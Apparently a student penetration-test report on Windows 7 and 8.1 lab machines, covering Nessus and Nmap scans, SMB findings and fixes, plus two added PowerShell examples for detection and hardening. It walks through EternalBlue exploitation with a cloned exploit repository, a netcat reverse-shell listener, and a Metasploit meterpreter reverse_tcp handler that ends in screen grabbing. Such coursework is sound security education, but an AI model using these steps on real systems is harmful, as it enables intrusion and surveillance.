Penetration Testing Report

Uploaded to Scribd by matifj4n0987

Document details:
Completed on August 26, 2023

Report type: manual and tool-based scanning with exploitation

Group members:
Mashal Khan
Umar Khan
Khalil ur Rehman
Atif
Table of Contents
1: Executive Summary
1.1 : Scope of Testing
1.2 : Overview
1.3 : Recommendations

2: Network Scanning
2.1 : Nessus Scanning
2.2 : Nmap Scanning
2.3 : Critical Findings
2.4 : High Findings
2.5 : Medium Findings
2.6 : Low Findings

4: Exploitation
4.1 : Netcat
4.2 : Metasploit

5: Conclusion
5.1 : Summary of Findings
5.2 : Summary of Exploits

1. Executive Summary
In this report we tested the network to find out how to secure it. We describe what we did, what we found, and what we do to keep the network safe. But our report is not only about safety; in it we also show how to exploit those systems.

1.1 : Scope of Testing

Here we looked at the whole network to find loopholes, weak points, and security problems: how to fix them and how to exploit them.

1.2 : Overview
This report is like checking a house to make sure it is safe from robbers, but here we also act like the robbers. First we find the weak points of the system by scanning with multiple tools and learn about those loopholes, and then how to exploit those vulnerabilities.

1.3 : Recommendations
Here we studied the problems and found the best way to solve them. These suggestions act like a protector that keeps your computers safe from hackers.
2. Network Scanning
Network scanning is like a robber finding which windows and doors are open so that he can get into the house easily. In the computer world this process uses special tools to find all the places where the network can be vulnerable. It is like checking for unlocked doors that hackers use to get into the computer.

2.1 : Nessus
Nessus is a very powerful tool for scanning networks. With it we find the vulnerabilities that an attacker can use to exploit our system, so in this report we use Nessus for scanning.

Download link:
https://www.tenable.com/downloads/nessus?loginAttempted=true

Scan of Windows 8.1 with Nessus

2.2 : Critical and High Vulnerabilities

Here we scanned the network and found two types of vulnerabilities: Critical and High.

1. The Critical vulnerability is SMBv1

SMBv1 is a network file sharing protocol. It was introduced by Microsoft in the 1980s as a way to allow computers to share files and printers over the network.
SMBv1 is not very safe, because a hacker can easily break in and control your desktop remotely.

Solution
If you want to solve this problem, turn off SMBv1 and use SMBv2 and SMBv3; they are much safer than SMBv1.
The second thing is to keep your system updated, because updates fix the holes.

There were only two vulnerabilities and 34 informational findings about the system.
- No High vulnerability
- No Low vulnerability
2.2 : Scanning with Nmap
Nmap
Nmap is like a digital detective for computer networks. It is a special tool that investigates and explores networks to find out what devices are there and what services are running.
In simple words, Nmap is a computer program that helps you look at networks to see which devices are connected and what they are actually doing.
Now we start the scanning.

I. The first command is sudo nmap -p- (target ip)

This is the Nmap command we used to scan the network of the target machine; we use it to check which ports are open on the target machine.
As you can see in the picture, many ports are open. Attackers mostly use port 445/tcp.

Port 445/tcp is used for communication, to send and receive files, and computers communicate with each other over it, so it is important to keep it safe and secure.
II. The second command is nmap --script vuln (target ip)

We use this command to find weak points that a hacker can easily exploit on the target machine. These vulnerabilities are like open windows that a hacker uses to get in.

We have many methods to exploit Windows, for example:

- Exploit with a vulnerability
- Exploit with payloads
- Exploit with Netcat

4. Exploitation
Here we exploited Windows 8.1 using Netcat and the MS17-010 exploit code which is available on GitHub; here we did not use Metasploit. We can exploit EternalBlue manually using the code.
4.1 Netcat
Netcat is a tool that lets computers talk to each other over the network. It can help to send and receive information between computers in different ways. It is very useful for checking connections and transferring files.

- First of all, open your Kali Linux terminal and write this command:
$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
- We use this command to clone the repository of the GitHub code.
- After that we give a command to enter the AutoBlue-MS17-010 folder:
$ cd AutoBlue-MS17-010
- In the next step we install the requirements:
$ pip install -r requirements.txt
- In the next step we enter the shellcode folder.
- In this stage we compile a shellcode for the target machine.
- To give execute permission we use this command:
$ chmod +x shell_prep.sh
- The command to create the shellcode is:
$ ./shell_prep.sh

- Based on the target system architecture you can use the 32-bit kernel shellcode or the 64-bit kernel shellcode. You can set your LHOST and LPORT.
- After completing this we sent that script to the victim, and on our system we created a listener.
- The listener command is $ nc -nvlp (port)

- When the victim clicks on that file you get access to cmd.

This is the cmd access on the victim system.
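As an added example, not from the report and written from the defender's side: the Netcat step above ends with the attacker holding cmd.exe on the victim, so on the victim the tell-tale event is a shell process opening an outbound TCP connection. Assuming Sysmon is installed with network-connection logging (Event ID 3), this PowerShell query lists such connections; the process list, ignored ports and lookback window are my choices.

```powershell
<#
Added example, not part of the report: spot the reverse-shell pattern from the
Netcat step above on the victim side. The shellcode hands the attacker cmd.exe,
so the tell-tale event is a shell or script host opening an outbound TCP
connection. Assumes Sysmon is installed with network-connection logging
(Event ID 3); the lookback window, process list and ignored ports are mine.
#>
param([int]$Hours = 24)

$shells = 'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'nc.exe'
# Ports where an outbound connection from a shell is common enough to ignore here.
$quietPorts = 80, 443

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 3
    StartTime = (Get-Date).AddHours(-$Hours)
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Sysmon stores its fields as <Data Name="..."> elements inside EventData.
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    $image = [IO.Path]::GetFileName($d.Image).ToLower()
    if ($shells -notcontains $image) { continue }
    if ($d.Initiated -ne 'true') { continue }            # only connections this host opened
    if ($quietPorts -contains [int]$d.DestinationPort) { continue }

    [pscustomobject]@{
        Time    = $e.TimeCreated
        Process = $d.Image
        Pid     = $d.ProcessId
        User    = $d.User
        Remote  = "$($d.DestinationIp):$($d.DestinationPort)"
    }
}
```

A hit for cmd.exe connecting to the listener port set in shell_prep.sh is exactly what the nc -nvlp step above produces on the victim.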


Windows 7

- Now we scan Windows 7 using Nessus and Nmap, and after this process we will exploit Windows 7 using the Metasploit tool.

We already defined what Nessus is and where to download it, so here we start directly from scanning.
So let's go...

- After all the scans we found only two types of vulnerabilities. One is Critical, of which we found only one vulnerability.
- And second we found Medium vulnerabilities, of which the count is one.
- Medium Vulnerability

This vulnerability is related to SMB, which we already discussed in previous topics. As a quick overview: SMB is basically a transport protocol; computers communicate and share files with SMB. Hackers can easily exploit these types of vulnerabilities.

- Here are the relevant details:

1. Vulnerability name: SMB Signing not required
2. ID: 57608
3. Version: 1.20
4. Severity: Medium
- Critical Vulnerability

- This vulnerability's name is Unsupported Windows OS (remote).

- It means you are using a version of the Windows operating system that is no longer updated, like Windows 7 and 8, which are outdated Windows operating systems. Most organizations are still using Windows 7 and 8 in this era for some reasons; for example, our BRT system in Peshawar is still using Windows 7.

Solution
- Keep your Windows operating system updated
- Move to a new Windows operating system
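As an added example that is not part of the report, the following PowerShell script audits one Windows host for the two SMB findings this report raises (SMBv1 enabled, from the Windows 8.1 scan in section 2.2, and "SMB Signing not required", plugin 57608, from the Windows 7 scan above) and applies the solutions described. It assumes an elevated prompt; the -Remediate switch and the MS17-010 KB list are my additions.

```powershell
<#
Added example, not part of the report: audit one Windows host for the two SMB
findings above (SMBv1 enabled; SMB signing not required, Nessus plugin 57608)
and optionally fix them. Run from an elevated PowerShell prompt. Windows 7 only
has the LanmanServer registry switches; Windows 8.1 also exposes SMBv1 as an
optional feature, so both paths are handled. The -Remediate switch is mine.
#>
param([switch]$Remediate)

$lanman   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$params   = Get-ItemProperty -Path $lanman
$findings = @()

# SMBv1: the registry value is absent by default, and absent means enabled.
$smb1On = ($null -eq $params.SMB1) -or ($params.SMB1 -ne 0)
$dismAvailable = [bool](Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue)  # Windows 8.1+
if ($dismAvailable) {
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
    $smb1On  = $smb1On -or ($feature.State -eq 'Enabled')
}
if ($smb1On) {
    $findings += 'CRITICAL: SMBv1 is enabled'
    if ($Remediate) {
        Set-ItemProperty -Path $lanman -Name SMB1 -Type DWord -Value 0
        if ($dismAvailable) {
            Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
        }
    }
}

# SMB signing: RequireSecuritySignature = 1 is what clears plugin 57608.
if ($params.RequireSecuritySignature -ne 1) {
    $findings += 'MEDIUM: SMB signing not required'
    if ($Remediate) {
        Set-ItemProperty -Path $lanman -Name RequireSecuritySignature -Type DWord -Value 1
    }
}

# MS17-010: the March 2017 updates for Windows 7 / 8.1. Later cumulative rollups
# supersede them, so a miss here is a prompt to verify, not proof of exposure.
$ms17010 = 'KB4012212', 'KB4012215', 'KB4012213', 'KB4012216'
if (-not (Get-HotFix | Where-Object { $ms17010 -contains $_.HotFixID })) {
    $findings += 'CHECK: no March 2017 MS17-010 update found; confirm patch level'
}

if ($findings.Count -eq 0) { $findings = @('OK: no SMB findings') }
$findings | ForEach-Object { Write-Output $_ }
if ($Remediate -and $smb1On) { Write-Output 'Reboot required for the SMBv1 change to take effect.' }
```

Re-running the Nessus scan after -Remediate and a reboot should no longer report the SMBv1 or plugin 57608 findings; the unsupported-OS finding only goes away with the upgrade the Solution above recommends.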


- Now we scan this victim IP using Nmap.
In previous topics we already discussed in a simple way what Nmap is and how it works, so I will give a quick overview: Nmap is a very famous Linux tool used to scan the network to investigate who is on the network and what is running on it.

First we check the open ports on the network, so open your Kali terminal and write this command for scanning the network and checking ports.
This command is known as a full port scan; it scans all 65535 ports.
$ nmap -p- (target ip)

- As you can see, many ports are open, but attackers mostly use port 445/tcp; we already discussed in previous topics what port 445/tcp is and why hackers use it.
- This is the result of the Nmap scan.

Now we scan for vulnerabilities, so we use this command:
$ nmap -A (target ip)

Here we find vulnerabilities using this command.


4.2 Metasploit
In simple words, Metasploit is like a toolbox for cyber security experts. They use this tool to find vulnerabilities in computers and networks. Hackers use it to exploit systems and other things. Ethical hackers also use this tool to find vulnerabilities and fix them.

To run it in Kali Linux, first open your Kali Linux terminal and write this command: $ msfconsole
After running Metasploit you can use it for your problems and situation.

Here we searched for exploits; Metasploit has 2315 exploits, so you can search for your problem. Here we selected MS17-010 EternalBlue SMB Remote Windows, so we selected exploit number 0.
Then use the multi handler.
After choosing the exploit we check the options to see what we need to set.
Here we need to set the payload, LHOST and LPORT.

$ use multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST (local host)
$ set LPORT (local port)
Now in this phase we create a session with the victim system; to create the session we type the exploit or run command.

- As you can see, we finally got one meterpreter session on the Windows 7 operating system.
- If you want information about the system, run the sysinfo command in meterpreter.
- For screen grabbing, first run load espia, then write the screengrab command.
- There are several commands that you can use for your requirements.
5: Conclusion
In this report we covered what scanning is, how to scan a network using Nessus and Nmap in Kali Linux, and all the relevant topics briefly. We also covered how to exploit a system, and the solutions to the vulnerabilities: how to fix them and how to protect our system.

5.1 : Summary of Findings

In this report we covered scanning: how to scan a network with Nessus and which types of vulnerabilities exist on our systems. We covered the critical vulnerabilities, how that vulnerability affects our system and how to solve it, as well as the medium vulnerability related to SMB. We also covered Nmap scanning: how to scan all the ports of the network and how to find vulnerabilities.

5.2 : Summary of Exploits

In this report we covered how to exploit a system. We exploited two types of Windows operating systems, Windows 7 and Windows 8, with two methods, Netcat and Metasploit: we exploited Windows 7 with Metasploit and Windows 8 with Netcat. We covered every step in detail: how to clone a repository from GitHub, how to exploit with Netcat and how to run Metasploit. We covered every basic point.
